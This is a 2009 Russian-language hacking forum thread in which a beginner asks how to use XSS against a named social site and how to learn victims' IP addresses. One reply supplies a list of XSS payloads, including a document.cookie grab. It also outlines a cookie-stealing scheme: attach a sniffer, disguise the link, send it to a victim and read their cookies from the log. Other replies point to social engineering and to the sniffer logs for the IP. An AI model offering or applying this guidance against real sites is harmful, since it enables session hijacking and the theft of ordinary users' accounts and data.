XSS помогите

Discussion in 'Безопасность и Анонимность' started by sakrej1, 11 Dec 2009.

  1. sakrej1

    sakrej1 New Member

    Joined:
    21 Nov 2009
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Люди помогите! Прочитал вот это и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что.
    Меня интересует что бы это работало на www.one.lv Или помогите на практике. Могу дать аккаунт для опытов, если кто решит помоч.
    P.S. В гугл просьба непосылать, там кроме этой статьи ничего нет.
    P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы?
     
  2. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    если ты там ничего непонял никто тебе необъяснит там и так все подробно расписано
     
  3. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Логинься и подставляй во все поля всевозможные комбинации:

    Code:
    <img src="javascript:alert('XSS')"</img>
    
    <IMG SRC=javascript:alert('XSS')>
    
    <IMG SRC=javascript:alert(&quot;XSS&quot;)>
    
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    
    <IMG SRC=javascript:alert('XSS')>
    
    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
    
    <<SCRIPT>alert("XSS");//<</SCRIPT>
    
    <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
    
    <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
    
    "><script>alert(document.cookie)</script>
    Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои.
     
    #3 root_sashok, 11 Dec 2009
    Last edited: 11 Dec 2009
  4. Nizhegorodets

    Nizhegorodets Member

    Joined:
    21 Mar 2009
    Messages:
    80
    Likes Received:
    66
    Reputations:
    9
    Насчет IP жертвы и инфы, СИ тебе в помощь

     
  5. DiHWO

    DiHWO Member

    Joined:
    23 Oct 2009
    Messages:
    93
    Likes Received:
    10
    Reputations:
    0
    Если чесно, я когда изучал xss тоже ничего по этой статье непонял, до меня долго доходило, надо сам смысл почувствовать. А вот про то что в гугле только одна страница - убило.
    В логах сниффера будет айпи, в поле реферер или аналогичном ему.
     
  6. sakrej1

    sakrej1 New Member

    Joined:
    21 Nov 2009
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Ну вроде разобрался....Появилась другая проблема... Опыты ставил на форуме.Когда я из этого списка вставляю по одной строке, то мне ее и пишет. А когда я пытался засунуть весь список, то он почти на всех строках выдавал значок (картинка) и писал что "много кодировки,нельзя загрузить" Вот с этим как быть?
    P.S. Форма отправки сообщений юзеру и сообщений на форум одинакова.
     
    #6 sakrej1, 12 Dec 2009
    Last edited: 12 Dec 2009